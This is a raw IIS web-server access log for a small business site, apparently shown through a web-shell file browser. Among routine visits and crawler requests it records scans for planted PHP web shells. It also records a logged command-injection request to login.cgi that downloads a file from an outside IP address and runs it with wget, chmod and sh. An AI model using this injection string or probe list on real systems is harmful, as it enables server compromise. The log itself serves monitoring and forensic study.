|
Server : Apache/2.4.62 System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64 User : www ( 80) PHP Version : 8.3.8 Disable Function : NONE Directory : /domains/smartny/logs/W2K3WEB3/ |
Upload File : |
#Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 01:29:26 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 01:29:26 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 212 109 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 04:12:09 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 04:12:09 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.64+Safari/537.11 - - 200 0 7936 258 15 2018-08-15 04:26:22 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 211 0 2018-08-15 04:29:58 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 211 109 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 06:10:24 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 06:10:24 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - - 200 0 24353 212 15 2018-08-15 06:19:43 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 209 109 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 07:12:29 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 07:12:29 W3SVC1397 W2K3WEB3 192.168.25.12 GET /controlledenglish.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 3781 319 78 2018-08-15 07:13:43 W3SVC1397 W2K3WEB3 192.168.25.12 GET /recommend.html Default.htm 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 2663 324 0 2018-08-15 07:16:58 W3SVC1397 W2K3WEB3 192.168.25.12 GET /payment.html - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 8311 310 15 2018-08-15 07:16:58 W3SVC1397 W2K3WEB3 192.168.25.12 GET /smart_starterkit.html - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 3026 319 31 2018-08-15 07:16:58 W3SVC1397 W2K3WEB3 192.168.25.12 GET /quick_quote.html - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 4093 314 15 2018-08-15 07:16:58 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 7936 298 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 07:54:06 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 07:54:06 W3SVC1397 W2K3WEB3 192.168.25.12 GET /manager/html - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+MSIE+10.0;+Windows+NT+6.2;+WOW64;+Trident/6.0) - - 404 3 1850 241 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 08:39:23 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 08:39:23 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.0 - - - 200 0 24372 70 15 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 09:10:32 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 09:10:32 W3SVC1397 W2K3WEB3 192.168.25.12 GET /robots.txt - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - - 404 2 1850 257 0 2018-08-15 09:10:32 W3SVC1397 W2K3WEB3 192.168.25.12 GET /ultraxml_editor_maxit.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Linux;+Android+6.0.1;+Nexus+5X+Build/MMB29P)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2272.96+Mobile+Safari/537.36+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - - 200 0 8637 471 15 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 11:22:35 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 11:22:34 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - - 200 0 7936 319 15 2018-08-15 11:27:21 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Firefox/52.0 - - 200 0 7936 329 0 2018-08-15 11:39:11 W3SVC1397 W2K3WEB3 192.168.25.12 POST /wuwu11.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 210 15 2018-08-15 11:39:13 W3SVC1397 W2K3WEB3 192.168.25.12 POST /wc.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 206 0 2018-08-15 11:39:13 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xx.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 11:39:15 W3SVC1397 W2K3WEB3 192.168.25.12 POST /sheep.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 11:39:16 W3SVC1397 W2K3WEB3 192.168.25.12 POST /db__.init.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 216 0 2018-08-15 11:39:16 W3SVC1397 W2K3WEB3 192.168.25.12 POST /mx.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 206 0 2018-08-15 11:39:17 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xshell.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 211 0 2018-08-15 11:39:17 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 206 15 2018-08-15 11:39:17 W3SVC1397 W2K3WEB3 192.168.25.12 POST /conflg.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 215 0 2018-08-15 11:39:19 W3SVC1397 W2K3WEB3 192.168.25.12 POST /lindex.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 215 0 2018-08-15 11:39:19 W3SVC1397 W2K3WEB3 192.168.25.12 POST /phpstudy.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 212 0 2018-08-15 11:39:19 W3SVC1397 W2K3WEB3 192.168.25.12 POST /weixiao.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 217 0 2018-08-15 11:39:20 W3SVC1397 W2K3WEB3 192.168.25.12 POST /feixiang.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 219 0 2018-08-15 11:39:31 W3SVC1397 W2K3WEB3 192.168.25.12 POST /yao.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 212 0 2018-08-15 11:39:31 W3SVC1397 W2K3WEB3 192.168.25.12 POST /defect.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 215 0 2018-08-15 11:39:31 W3SVC1397 W2K3WEB3 192.168.25.12 POST /webslee.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 214 0 2018-08-15 11:39:33 W3SVC1397 W2K3WEB3 192.168.25.12 POST /q.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 209 0 2018-08-15 11:39:34 W3SVC1397 W2K3WEB3 192.168.25.12 POST /hm.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 207 15 2018-08-15 11:39:34 W3SVC1397 W2K3WEB3 192.168.25.12 POST /cainiao.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 218 0 2018-08-15 11:39:36 W3SVC1397 W2K3WEB3 192.168.25.12 POST /system.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 212 0 2018-08-15 11:39:36 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xiaoma.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 212 0 2018-08-15 11:39:36 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 11:39:37 W3SVC1397 W2K3WEB3 192.168.25.12 POST /data.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 210 0 2018-08-15 11:39:37 W3SVC1397 W2K3WEB3 192.168.25.12 POST /log.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 207 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 12:17:39 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 12:17:39 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 211 15 2018-08-15 12:24:16 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+zgrab/0.x - - 200 0 7936 142 0 2018-08-15 12:29:26 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - - 200 0 24353 213 15 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 13:04:50 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 13:04:50 W3SVC1397 W2K3WEB3 192.168.25.12 HEAD /Default.htm - 80 - 192.168.25.52 HTTP/1.1 - - - 200 0 383 70 93 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 13:47:27 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 13:47:27 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 7936 298 0 2018-08-15 13:55:48 W3SVC1397 W2K3WEB3 192.168.25.12 GET /support2.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm) - - 200 0 2595 277 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 14:33:48 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 14:33:48 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 260 15 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 15:10:24 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 15:10:24 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - - 200 0 24353 212 31 2018-08-15 15:10:46 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - - 200 0 24353 211 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 16:04:46 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 16:04:46 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36 - http://www.smartcom.nyc 200 0 7955 459 15 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 16:28:44 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 16:28:44 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.0 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - - 200 0 24372 154 15 2018-08-15 16:32:10 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.2;en-US)+AppleWebKit/537.32.36+(KHTML,+live+Gecko)+Chrome/57.0.3053.86+Safari/537.32 - - 200 0 7936 259 0 2018-08-15 16:38:02 W3SVC1397 W2K3WEB3 192.168.25.12 GET /login.cgi cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ 80 - 192.168.25.52 HTTP/1.1 LMAO/2.0 - - 404 2 1850 265 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 17:02:53 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 17:02:53 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Linux;+Android+6.0.1;+Nexus+5X+Build/MMB29P)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2272.96+Mobile+Safari/537.36+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - - 200 0 7936 445 15 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 18:38:29 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 18:38:29 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - - 200 0 24353 210 31 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 20:20:20 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 20:20:20 W3SVC1397 W2K3WEB3 192.168.25.12 GET /webdav/ - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 120 15 2018-08-15 20:20:25 W3SVC1397 W2K3WEB3 192.168.25.12 GET /java.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 151 0 2018-08-15 20:20:28 W3SVC1397 W2K3WEB3 192.168.25.12 GET /_query.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 153 0 2018-08-15 20:20:39 W3SVC1397 W2K3WEB3 192.168.25.12 GET /logon.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 152 0 2018-08-15 20:22:12 W3SVC1397 W2K3WEB3 192.168.25.12 GET /text.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 151 0 2018-08-15 20:22:20 W3SVC1397 W2K3WEB3 192.168.25.12 GET /muhstik.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 154 0 2018-08-15 20:22:32 W3SVC1397 W2K3WEB3 192.168.25.12 GET /lol.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 150 0 2018-08-15 20:22:40 W3SVC1397 W2K3WEB3 192.168.25.12 GET /cmv.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 150 0 2018-08-15 20:22:44 W3SVC1397 W2K3WEB3 192.168.25.12 GET /knal.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1850 151 0 2018-08-15 20:23:12 W3SVC1397 W2K3WEB3 192.168.25.12 POST /9678.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 209 0 2018-08-15 20:23:27 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xx.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 209 0 2018-08-15 20:23:31 W3SVC1397 W2K3WEB3 192.168.25.12 POST /w.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 209 0 2018-08-15 20:23:33 W3SVC1397 W2K3WEB3 192.168.25.12 POST /sheep.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 209 15 2018-08-15 20:23:39 W3SVC1397 W2K3WEB3 192.168.25.12 POST /db_session.init.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 223 0 2018-08-15 20:23:41 W3SVC1397 W2K3WEB3 192.168.25.12 POST /db__.init.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 217 0 2018-08-15 20:23:51 W3SVC1397 W2K3WEB3 192.168.25.12 POST /mx.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 207 0 2018-08-15 20:23:53 W3SVC1397 W2K3WEB3 192.168.25.12 POST /wshell.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 213 0 2018-08-15 20:23:57 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 207 0 2018-08-15 20:24:07 W3SVC1397 W2K3WEB3 192.168.25.12 POST /weixiao.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 218 0 2018-08-15 20:24:11 W3SVC1397 W2K3WEB3 192.168.25.12 POST /ak47.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 217 0 2018-08-15 20:24:19 W3SVC1397 W2K3WEB3 192.168.25.12 POST /defect.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 216 0 2018-08-15 20:24:33 W3SVC1397 W2K3WEB3 192.168.25.12 POST /pe.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 210 0 2018-08-15 20:24:35 W3SVC1397 W2K3WEB3 192.168.25.12 POST /hm.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 20:24:49 W3SVC1397 W2K3WEB3 192.168.25.12 POST /aotu.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 215 0 2018-08-15 20:25:01 W3SVC1397 W2K3WEB3 192.168.25.12 POST /system.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 213 0 2018-08-15 20:25:15 W3SVC1397 W2K3WEB3 192.168.25.12 POST /q.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 206 0 2018-08-15 20:25:23 W3SVC1397 W2K3WEB3 192.168.25.12 POST /mz.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 20:25:25 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xx.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 20:25:28 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qaq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 20:25:31 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qaq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 208 0 2018-08-15 20:26:16 W3SVC1397 W2K3WEB3 192.168.25.12 POST /ip.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 210 0 2018-08-15 20:26:21 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 206 0 2018-08-15 20:26:29 W3SVC1397 W2K3WEB3 192.168.25.12 POST /post.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 210 0 2018-08-15 20:26:32 W3SVC1397 W2K3WEB3 192.168.25.12 POST /h1.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 207 0 2018-08-15 20:26:42 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xiaomae.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 214 0 2018-08-15 20:26:44 W3SVC1397 W2K3WEB3 192.168.25.12 POST /xiaomar.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 214 15 2018-08-15 20:26:46 W3SVC1397 W2K3WEB3 192.168.25.12 POST /qq.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 209 0 2018-08-15 20:26:48 W3SVC1397 W2K3WEB3 192.168.25.12 POST /data.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 211 0 2018-08-15 20:26:52 W3SVC1397 W2K3WEB3 192.168.25.12 POST /fack.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 210 15 2018-08-15 20:26:54 W3SVC1397 W2K3WEB3 192.168.25.12 POST /angge.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0 - - 404 2 1869 214 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 22:17:17 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 22:17:17 W3SVC1397 W2K3WEB3 192.168.25.12 GET /login.cgi cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ 80 - 192.168.25.52 HTTP/1.1 LMAO/2.0 - - 404 2 1850 266 0 2018-08-15 22:18:27 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - - 200 0 24353 213 31 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 22:51:54 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 22:51:54 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - - 200 0 24353 219 15 2018-08-15 22:51:54 W3SVC1397 W2K3WEB3 192.168.25.12 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - - 200 0 24353 213 0 2018-08-15 22:56:30 W3SVC1397 W2K3WEB3 192.168.25.12 GET /login.cgi cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ 80 - 192.168.25.52 HTTP/1.1 LMAO/2.0 - - 404 2 1850 266 0 #Software: Microsoft Internet Information Services 6.0 #Version: 1.0 #Date: 2018-08-15 23:48:07 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 2018-08-15 23:48:06 W3SVC1397 W2K3WEB3 192.168.25.12 GET /phpmyadmin/scripts/setup.php - 80 - 192.168.25.52 HTTP/1.1 